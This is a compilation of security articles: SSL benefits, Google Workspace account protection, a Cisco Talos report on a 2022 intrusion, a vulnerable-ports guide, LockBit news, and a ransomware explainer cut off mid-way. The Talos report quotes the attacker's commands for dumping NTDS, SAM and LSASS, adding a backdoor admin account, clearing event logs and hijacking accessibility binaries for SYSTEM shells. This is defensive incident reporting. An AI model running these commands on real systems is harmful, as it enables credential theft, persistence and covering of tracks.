This is the biggest benefit of adding an SSL certificate to your hostname. The extra layer of encryption shows that your hostname is safe for people to visit. All of your visitor’s data will now be transmitted over an encrypted connection to the hostname and others won’t be able to see what is being sent.

The SSL Certificate also checks that the information it receives is coming from the expected domain. So, if your customer sends personal or private information, the SSL Certificate guarantees it is being sent to the secure site, and not to a potentially malicious one.

Ensures Data Integrity

A website that doesn’t have an SSL Certificate enabled sends data in a plain text format. This means that all of the data that is being sent between the server and the browser can be easily read. If a hacker were to gain access to your domain and then change the information being presented on your hostname, this is an example of domain spoofing.

Domain spoofing happens when a hacker gains access to the information on a website and then changes it before it gets sent to the browser for the user. When this happens, the user is typically not even aware they are visiting a compromised website. When an SSL certificate is enabled on the hostname, this becomes much harder as the data is not sent in plain text, but is sent in an encrypted, unreadable format.

Gains Your Users Trust

When you use an SSL Certificate, your hostname shows up with an HTTPS and a lock icon, signifying the hostname is secure. This helps users feel safe when they are on your hostname and makes them feel comfortable if you are asking them to enter sensitive information, like credit cards, or Social Security numbers.

Our Free Dynamic DNS, Enhanced Dynamic DNS and Plus Managed DNS accounts both come with 1 Free TrustCor Standard DV SSL Certificate. Additional SSL Certificates can be purchased and start at just $19.99 per year. You can learn more about each SSL Certificate and how you can add one today here.

Source :
https://www.noip.com/blog/2022/02/22/benefits-adding-ssl-certificate-ip-free-enhanced-hostname/

Google now blocks Workspace account hijacking attempts automatically

Google Workspace (formerly G Suite) now has stronger protections for risky account actions, automatically blocking hijacking attempts with identity verification prompts and logging them for further investigation.

This added layer of security will block threat actors who gain access to a user’s account to protect personal data and sensitive information belonging to their organization.

The enhanced account protection capabilities are available to all Google Workspace customers, including legacy G Suite Basic and Business customers.

“Google will evaluate the session attempting the action, and if it’s deemed risky, it will be challenged with a ‘Verify it’s You’ prompt,” Google said.

“Through a second and trusted factor, such as a 2-step verification code, users can confirm the validity of the action.”

For instance, this new feature would block sensitive actions such as attempts to change the account’s name until “the true account owner can verify that this was intentional.”

Admins can disable it for users stuck behind login prompts

Google added that admins could also temporarily disable login challenges triggered on sensitive account actions for users who can’t get past the verification prompts.

“In the Admin console under Users > ‘UserName’> Security, admins can toggle login challenges OFF for ten minutes if a user gets stuck behind a ‘verify it’s you prompt’,” the company explained.

“We strongly recommend only using this option if contact with the user is credibly established, such as via a video call.”

It’s also important to mention that this feature only supports users using Google as their identity provider, blocking actions taken within Google products, with SAML users not being supported now.

This update builds on a previous Google Workspace security improvement announced in June, with new alerts added to inform of critical and sensitive changes to admin accounts.

Google has further secured Workspace users from attacks by rolling out new Google Drive warning banners in January to warn them of potentially suspicious files used for malware delivery and phishing attacks.

One year ago, in June 2021, the company also added new Google Drive phishing and malware protections for enterprises that automatically mark all suspicious files, making them only visible to admins and owners.

Source :
https://www.bleepingcomputer.com/news/security/google-now-blocks-workspace-account-hijacking-attempts-automatically/

Cisco Talos shares insights related to recent cyber attack on Cisco

UPDATE HISTORY

DATE	DESCRIPTION OF UPDATES
Aug. 10th 2022	Adding clarifying details on activity involving active directory.
Aug. 10th 2022	Update made to the Cisco Response and Recommendations section related to MFA.

EXECUTIVE SUMMARY

On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate.
During the investigation, it was determined that a Cisco employee’s credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized.
The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user.
CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc.
After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment.
The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful.
We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators.
For further information see the Cisco Response page here.

INITIAL VECTOR

Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka “vishing”) and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers – who spoke in English with various international accents and dialects – purported to be associated with support organizations trusted by the user.

Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to login to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms.

POST-COMPROMISE TTPS

Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment.

Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, hostname, and identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating manual operator interaction was occurring within the environment.

After establishing access to the VPN, the attacker then began to use the compromised user account to logon to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.

After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using “ntdsutil.exe” consistent with the following syntax:

powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q q

They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.

After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment.

Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called “z” on the system using the built-in Windows “net.exe” commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the “z” account by this actor in previous engagements prior to the Russian invasion of Ukraine.

C:\Windows\system32\net user z Lh199211* /add

C:\Windows\system32\net localgroup administrators z /add

This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database on compromised windows hosts.

reg save hklm\system system

reg save hklm\sam sam

reg save HKLM\security sec

On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS.

tasklist | findstr lsass

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\windows\temp\lsass.dmp full

The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the “wevtutil.exe” utility to identify and clear event logs generated on the system.

wevtutil.exe el

wevtutil.exe cl [LOGNAME]

In many cases, we observed the attacker removing the previously created local administrator account.

net user z /delete

To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems.

netsh advfirewall firewall set rule group=remote desktop new enable=Yes

We also observed the installation of additional remote access tools, such as TeamViewer and LogMeIn.

C:\Windows\System32\msiexec.exe /i C:\Users\[USERNAME]\Pictures\LogMeIn.msi

The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f

This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.

Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employee’s account and employee authentication data from active directory. The Box data obtained by the adversary in this case was not sensitive.

In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes.

After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.

BACKDOOR ANALYSIS

The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a “DELETE_SELF” command that removes the backdoor from the system completely. Another, more interesting, command, “WIPE”, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts.

Commands are retrieved by making HTTP GET requests to the C2 server using the following structure:

/bot/cmd.php?botid=%.8x

The malware also communicates with the C2 server via HTTP GET requests that feature the following structure:

/bot/gate.php?botid=%.8x

Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.

The aforementioned HTTP requests are sent using the following user-agent string:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 Trailer/95.3.1132.33

The malware also creates a file called “bdata.ini” in the malware’s current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:

C:\users\public\win\cmd.exe

The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.

Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack.

ATTACK ATTRIBUTION

Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations.

UNC2447 is a financially-motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as “double extortion,” in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more.

Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of the Lapsus$. Lapsus$ is a threat actor group that is reported to have been responsible for several previous notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information.

While we did not observe ransomware deployment in this attack, the TTPs used were consistent with “pre-ransomware activity,” activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements as well. In previous engagements, we also did not observe deployment of ransomware in the victim environments.

CISCO RESPONSE AND RECOMMENDATIONS

Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker’s progression. We created two ClamAV signatures, which are listed below.

Win.Exploit.Kolobko-9950675-0
Win.Backdoor.Kolobko-9950676-0

Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information.

Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious.

For Duo it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events like a brand-new device being used from unrealistic location or attack patterns like logins brute force can help detect unauthorized access.

Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices match the security requirements present in the environment. This can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment.

Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment.

Centralized log collection can help minimize the lack of visibility that results when an attacker take active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway.

In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization’s ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organization’s ability to effectively recover following an attack.

Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities.

MITRE ATT&CK MAPPING

All of the previously described TTPs that were observed in this attack are listed below based on the phase of the attack in which they occurred.

INDICATORS OF COMPROMISE

The following indicators of compromise were observed associated with this attack.

Hashes (SHA256)

184a2570d71eedc3c77b63fd9d2a066cd025d20ceef0f75d428c6f7e5c6965f3

2fc5bf9edcfa19d48e235315e8f571638c99a1220be867e24f3965328fe94a03

542c9da985633d027317e9a226ee70b4f0742dcbc59dfd2d4e59977bb870058d

61176a5756c7b953bc31e5a53580d640629980a344aa5ff147a20fb7d770b610

753952aed395ea845c52e3037f19738cfc9a415070515de277e1a1baeff20647

8df89eef51cdf43b2a992ade6ad998b267ebb5e61305aeb765e4232e66eaf79a

8e5733484982d0833abbd9c73a05a667ec2d9d005bbf517b1c8cd4b1daf57190

99be6e7e31f0a1d7eebd1e45ac3b9398384c1f0fa594565137abb14dc28c8a7f

bb62138d173de997b36e9b07c20b2ca13ea15e9e6cd75ea0e8162e0d3ded83b7

eb3452c64970f805f1448b78cd3c05d851d758421896edd5dfbe68e08e783d18

IP Addresses

104.131.30[.]201

108.191.224[.]47

131.150.216[.]118

134.209.88[.]140

138.68.227[.]71

139.177.192[.]145

139.60.160[.]20

139.60.161[.]99

143.198.110[.]248

143.198.131[.]210

159.65.246[.]188

161.35.137[.]163

162.33.177[.]27

162.33.178[.]244

162.33.179[.]17

165.227.219[.]211

165.227.23[.]218

165.232.154[.]73

166.205.190[.]23

167.99.160[.]91

172.56.42[.]39

172.58.220[.]52

172.58.239[.]34

174.205.239[.]164

176.59.109[.]115

178.128.171[.]206

185.220.100[.]244

185.220.101[.]10

185.220.101[.]13

185.220.101[.]15

185.220.101[.]16

185.220.101[.]2

185.220.101[.]20

185.220.101[.]34

185.220.101[.]45

185.220.101[.]6

185.220.101[.]65

185.220.101[.]73

185.220.101[.]79

185.220.102[.]242

185.220.102[.]250

192.241.133[.]130

194.165.16[.]98

195.149.87[.]136

24.6.144[.]43

45.145.67[.]170

45.227.255[.]215

45.32.141[.]138

45.32.228[.]189

45.32.228[.]190

45.55.36[.]143

45.61.136[.]207

45.61.136[.]5

45.61.136[.]83

46.161.27[.]117

5.165.200[.]7

52.154.0[.]241

64.227.0[.]177

64.4.238[.]56

65.188.102[.]43

66.42.97[.]210

67.171.114[.]251

68.183.200[.]63

68.46.232[.]60

73.153.192[.]98

74.119.194[.]203

74.119.194[.]4

76.22.236[.]142

82.116.32[.]77

87.251.67[.]41

94.142.241[.]194

Domains

cisco-help[.]cf

cisco-helpdesk[.]cf

ciscovpn1[.]com

ciscovpn2[.]com

ciscovpn3[.]com

devcisco[.]com

devciscoprograms[.]com

helpzonecisco[.]com

kazaboldu[.]net

mycisco[.]cf

mycisco[.]gq

mycisco-helpdesk[.]ml

primecisco[.]com

pwresetcisco[.]com

Email Addresses

costacancordia[@]protonmail[.]com

POSTED BY NICK BIASINI AT 3:30 PM

Source :
https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html

Open Port Vulnerabilities List

Insufficiently protected open ports can put your IT environment at serious risk. Threat actors often seek to exploit open ports and their applications through spoofing, credential sniffing and other techniques. For example, in 2017, cybercriminals spread WannaCry ransomware by exploiting an SMB vulnerability on port 445. Other examples include the ongoing campaigns targeting Microsoft’s Remote Desktop Protocol (RDP) service running on port 3389.

Handpicked related content:

[Free Guide] Network Security Best Practices

Read on to learn more about the security risks linked to ports, vulnerable ports that need your attention and ways to enhance the security of open ports.

A Refresher on Ports

Ports are logical constructs that identify a specific type of network service. Each port is linked to a specific protocol, program or service, and has a port number for identification purposes. For instance, secured Hypertext Transfer Protocol (HTTPS) messages always go to port 443 on the server side, while port 1194 is exclusively for OpenVPN.

The most common transport protocols that have port numbers are Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). TCP is a connection-oriented protocol with built-in re-transmission and error recovery. UDP is a connectionless protocol that doesn’t recover or correct errors in messages; it’s faster and has less network overhead traffic than TCP. Both TCP and UDP sit at the transport layer of the TCP/IP stack and use the IP protocol to address and route data on the internet. Software and services are designed to use TCP or UDP, depending on their requirements.

TCP and UDP ports are in one of these three states:

Open — The port responds to connection requests.
Closed — The port is unreachable, indicating that there is no corresponding service running.
Filtered — The firewall is monitoring traffic and blocking certain connection requests to the port.

Security Risks Linked to Ports

Numerous incidents have demonstrated that open ports are most vulnerable to attack when the services listening to them are unpatched or insufficiently protected or misconfigured, which can lead to compromised systems and networks. In these cases, threat actors can use open ports to perform various cyberattacks that exploit the lack of authentication mechanisms in the TCP and UDP protocols. One common example is spoofing, where a malicious actor impersonates a system or a service and sends malicious packets, often in combination with IP spoofing and man-in-the-middle-attacks. The campaign against RDP Pipe Plumbing is one of the latest to employ such a tactic. In addition, ports that have been opened on purpose (for instance, on a web server) can be attacked via that port using application-layer attacks such as SQL injection, cross-site request forgery and directory traversal.

Another common technique is the denial of service (DoS) attack, most frequently used in the form of distributed denial of service (DDoS), where attackers send massive numbers of connection requests from various machine to the service on the target in order to deplete its resources.

Vulnerable Ports that Need Your Attention

Any port can be targeted by threat actors, but some are more likely to fall prey to cyberattacks because they commonly have serious shortcomings, such as application vulnerabilities, lack of two-factor authentication and weak credentials.

Here are the most vulnerable ports regularly used in attacks:

Ports 20 and 21 (FTP)

Port 20 and (mainly) port 21 are File Transfer Protocol (FTP) ports that let users send and receive files from servers.

FTP is known for being outdated and insecure. As such, attackers frequently exploit it through:

Brute-forcing passwords
Anonymous authentication (it’s possible to log into the FTP port with “anonymous” as the username and password)
Cross-site scripting
Directory traversal attacks

Port 22 (SSH)

Port 22 is for Secure Shell (SSH). It’s a TCP port for ensuring secure access to servers. Hackers can exploit port 22 by using leaked SSH keys or brute-forcing credentials.

Port 23 (Telnet)

Port 23 is a TCP protocol that connects users to remote computers. For the most part, Telnet has been superseded by SSH, but it’s still used by some websites. Since it’s outdated and insecure, it’s vulnerable to many attacks, including credential brute-forcing, spoofing and credential sniffing.

Port 25 (SMTP)

Port 25 is a Simple Mail Transfer Protocol (SMTP) port for receiving and sending emails. Without proper configuration and protection, this TCP port is vulnerable to spoofing and spamming.

Port 53 (DNS)

Port 53 is for Domain Name System (DNS). It’s a UDP and TCP port for queries and transfers, respectively. This port is particularly vulnerable to DDoS attacks.

Ports 137 and 139 (NetBIOS over TCP) and 445 (SMB)

Server Message Block (SMB) uses port 445 directly and ports 137 and 139 indirectly. Cybercriminals can exploit these ports through:

Using the EternalBlue exploit, which takes advantage of SMBv1 vulnerabilities in older versions of Microsoft computers (hackers used EternalBlue on the SMB port to spread WannaCry ransomware in 2017)
Capturing NTLM hashes
Brute-forcing SMB login credentials

Ports 80, 443, 8080 and 8443 (HTTP and HTTPS)

HTTP and HTTPS are the hottest protocols on the internet, so they’re often targeted by attackers. They’re especially vulnerable to cross-site scripting, SQL injections, cross-site request forgeries and DDoS attacks.

Ports 1433,1434 and 3306 (Used by Databases)

These are the default ports for SQL Server and MySQL. They are used to distribute malware or are directly attacked in DDoS scenarios. Quite often, attackers probe these ports to find unprotected database with exploitable default configurations.

Port 3389 (Remote Desktop)

This port is used in conjunction with various vulnerabilities in remote desktop protocols and to probe for leaked or weak user authentication. Remote desktop vulnerabilities are currently the most-used attack type; one example is the BlueKeep vulnerability.

Tips for Strengthening the Security of Open Ports

Luckily, there are ways to enhance the security of open ports. We highly recommend the following six strategies:

1. Patch firewalls regularly.

Your firewall is the gatekeeper to all the other systems and services in your network. Patching keeps your firewalls up to date and repairs vulnerabilities and flaws in your firewall system that cybercriminals could use to gain full access to your systems and data.

2. Check ports regularly.

You should also regularly scan and check your ports. There are three main ways to do this:

Command-line tools — If you have the time to scan and check ports manually, use command-line tools to spot and scan open ports. Examples include Netstat and Network Mapper, both of which can be installed on a wide range of operating systems, including Windows and Linux.
Port scanners — If you want faster results, consider using a port scanner. It’s a computer program that checks if ports are open, closed or filtered. The process is simple: The scanner transmits a network request to connect to a specific port and captures the response.
Vulnerability scanning tools — Solutions of this type can also be used to discover ports that are open or configured with default passwords.

Track service configuration changes.

Many services on your network connect to various ports, so it is important to monitor the running states of installed services and continuously track changes to service configuration settings. Services can be vulnerable when they are unpatched or misconfigured.

Using Netwrix Change Tracker, you can harden your systems by tracking unauthorized changes and other suspicious activities. In particular, it provides the following functionality:

Actionable alerting about configuration changes
Automatic recording, analyzing, validating and verifying of every change
Real-time change monitoring
Constant application vulnerability monitoring

4. Use IDP and IPS tools.

Intrusion detection systems (IDS) and intrusion prevention systems (IPS) can help you prevent attackers from exploiting your ports. They monitor your network, spot possible cybersecurity incidents, log information about them and report the incidents to security administrators. IPS complements your firewalls by identifying suspicious incoming traffic and logging and blocking the attack.

5. Use SSH Keys.

Another option is to use SSH keys. These access credentials are more secure than passwords because decrypting SSH is very difficult, if not impossible. There are two types of SSH keys:

Private or identity keys, which identify users and give them access
Public or authorized keys, which determine who can access your system

You can use public-key cryptographic algorithms and key generation tools to create SSH keys.

6. Conduct penetration tests and vulnerability assessments.

Consider conducting penetration tests and vulnerability assessments to protect your ports. Although both of these techniques are used to spot vulnerabilities in IT infrastructure, they are quite different. Vulnerability scans only identify and report vulnerabilities, while penetration tests exploit security gaps to determine how attackers can gain unauthorized access to your system.

FAQs

What is an open port vulnerability?

An open port vulnerability is a security gap caused by an open port. Without proper configuration and protection, attackers can use open ports to access your systems and data.

Which ports are most vulnerable?

Certain ports and their applications are more likely to be targeted because they often have weaker credentials and defenses. Common vulnerable ports include:

FTP (20, 21)
SSH (22)
Telnet (23)
SMTP (25)
DNS (53)
NetBIOS over TCP (137, 139)
SMB (445)
HTTP and HTTPS (80, 443, 8080, 8443)
Ports 1433, 1434 and 3306
Remote desktop (3389)

Is port 80 a security risk?

Port 80 isn’t inherently a security risk. However, if you leave it open and don’t have the proper configurations in place, attackers can easily use it to access your systems and data. Unlike port 443 (HTTPS), port 80 is unencrypted, making it easy for cybercriminals to access, leak and tamper with sensitive data.

Source :
https://blog.netwrix.com/2022/08/04/open-port-vulnerabilities-list/

LockBit Ransomware Abuses Windows Defender to Deploy Cobalt Strike Payload

A threat actor associated with the LockBit 3.0 ransomware-as-a-service (RaaS) operation has been observed abusing the Windows Defender command-line tool to decrypt and load Cobalt Strike payloads.

According to a report published by SentinelOne last week, the incident occurred after obtaining initial access via the Log4Shell vulnerability against an unpatched VMware Horizon Server.

“Once initial access had been achieved, the threat actors performed a series of enumeration commands and attempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire, and a new way to side-load Cobalt Strike,” researchers Julio Dantas, James Haughom, and Julien Reisdorffer said.

LockBit 3.0 (aka LockBit Black), which comes with the tagline “Make Ransomware Great Again!,” is the next iteration of the prolific LockBit RaaS family that emerged in June 2022 to iron out critical weaknesses discovered in its predecessor.

It’s notable for instituting what’s the first-ever bug bounty for a RaaS program. Besides featuring a revamped leak site to name-and-shame non-compliant targets and publish extracted data, it also includes a new search tool to make it easier to find specific victim data.

The use of living-off-the-land (LotL) techniques by cyber intruders, wherein legitimate software and functions available in the system are used for post-exploitation, is not new and is usually seen as an attempt to evade detection by security software.

Earlier this April, a LockBit affiliate was found to have leveraged a VMware command-line utility called VMwareXferlogs.exe to drop Cobalt Strike. What’s different this time around is the use of MpCmdRun.exe to achieve the same goal.

MpCmdRun.exe is a command-line tool for carrying out various functions in Microsoft Defender Antivirus, including scanning for malicious software, collecting diagnostic data, and restoring the service to a previous version, among others.

In the incident analyzed by SentinelOne, the initial access was followed by downloading a Cobalt Strike payload from a remote server, which was subsequently decrypted and loaded using the Windows Defender utility.

“Tools that should receive careful scrutiny are any that either the organization or the organization’s security software have made exceptions for,” the researchers said.

“Products like VMware and Windows Defender have a high prevalence in the enterprise and a high utility to threat actors if they are allowed to operate outside of the installed security controls.”

The findings come as initial access brokers (IABs) are actively selling access to company networks, including managed service providers (MSPs), to fellow threat actors for profit, in turn offering a way to compromise downstream customers.

In May 2022, cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. warned of attacks weaponizing vulnerable managed service providers (MSPs) as an “initial access vector to multiple victim networks, with globally cascading effects.”

“MSPs remain an attractive supply chain target for attackers, particularly IABs,” Huntress researcher Harlan Carvey said, urging companies to secure their networks and implement multi-factor authentication (MFA).

Source :
https://thehackernews.com/2022/08/lockbit-ransomware-abuses-windows.html

What is ransomware and how can you defend your business from it?

Ransomware is a kind of malware used by cybercriminals to stop users from accessing their systems or files; the cybercriminals then threaten to leak, destroy or withhold sensitive information unless a ransom is paid.

Ransomware attacks can target either the data held on computer systems (known as locker ransomware) or devices (crypto-ransomware). In both instances, once a ransom is paid, threat actors typically provide victims with a decryption key or tool to unlock their data or device, though this is not guaranteed.

Oliver Pinson-Roxburgh, CEO of Defense.com, the all-in-one cybersecurity platform, shares knowledge and advice in this article on how ransomware works, how damaging it can be, and how your business can mitigate ransomware attacks from occurring.

What does a ransomware attack comprise?

There are three key elements to a ransomware attack:

Access

In order to deploy malware to encrypt files and gain control, cybercriminals need to initially gain access to an organization’s systems.

Trigger

The attackers have control of the data as soon as the malicious software is activated. The data is encrypted and no longer accessible by the targeted organization.

Demand

The victims will receive an alert that their data is encrypted and cannot be accessed until a ransom is paid.

Big business for cybercriminals

The motives of cybercriminals deploying malware may vary but the end goal is typically that of financial gain.

What is the cost of being targeted by ransomware?

The average pay-out from ransomware attacks has risen from $312,000/£260,000 in 2020 to $570,000/£476,000 in 2021 – an increase of 83%. One report also showed that 66% of organisations surveyed were victims of ransomware attacks in 2021, nearly double that of 2020 (37%). This highlights the need for businesses to understand the risks and implement stronger defenses to combat the threats.

Ransomware continues to rank amongst the most common cyberattacks in 2022, due to its lucrative nature and fairly low level of effort required from the perpetrators. This debilitating attack causes an average downtime of 3 weeks and can have major repercussions for an organization, for its finances, operations and reputation.

Because there is no guarantee that cybercriminals will release data after a ransom is paid, it is crucial to protect your data and keep offline backups of your files. It’s also very important to proactively monitor and protect entry points that a hacker may exploit, to reduce the possibility of being targeted in the first place.

Who is at risk of being a target of ransomware?

In the past, cybercriminals have typically targeted high-profile organizations, large corporations and government agencies with ransomware. This is known as ‘big game hunting’ and works on the premise that these companies are far more likely to pay higher ransoms and avoid unwanted scrutiny from the media and public. Certain organizations, such as hospitals, are higher-value targets because they are far more likely to pay a ransom and to do so quickly because they need access to important data urgently.

However, ransomware groups are now shifting their focus to smaller businesses, in response to increased pressure from law enforcement who are cracking down on well-known ransomware groups such as REvil and Conti. Smaller companies are seen as easy targets that may lack effective cybersecurity defenses to prevent a ransomware attack, making it easier to penetrate and exploit them.

Ultimately, threat actors are opportunists and will consider most organizations as targets, regardless of their size. If a cybercriminal notices a vulnerability, the company is fair game.

How is ransomware deployed?

Phishing attacks

The most common delivery method of ransomware is via phishing attacks. Phishing is a form of social engineering and is an effective method of attack as it relies on deceit and creating a sense of urgency. Threat actors trick employees into opening suspicious attachments in emails and this is often achieved by imitating either senior-level employees or other trusted figures of authority.

Malvertising

Malicious advertising is another tactic used by cybercriminals to deploy ransomware, where ad space is purchased and infected with malware that is then displayed on trusted and legitimate websites. Once the ad is clicked, or even in some cases when a user accesses a website that’s hosting malware, that device is infected by malware that scans the device for vulnerabilities to exploit.

Exploiting vulnerable systems

Ransomware can also be deployed by exploiting unpatched and outdated systems, as was the case in 2017, when a security vulnerability in Microsoft Windows, EternalBlue (MS17-010), led to the global WannaCry ransomware attack that spread to over 150 countries.

It was the biggest cyberattack to hit the NHS: it cost £92m in damages plus the added costs of IT support restoring data and systems affected by the attack, and it directly impacted patient care through cancelled appointments.

Four key methods to defend your business against ransomware

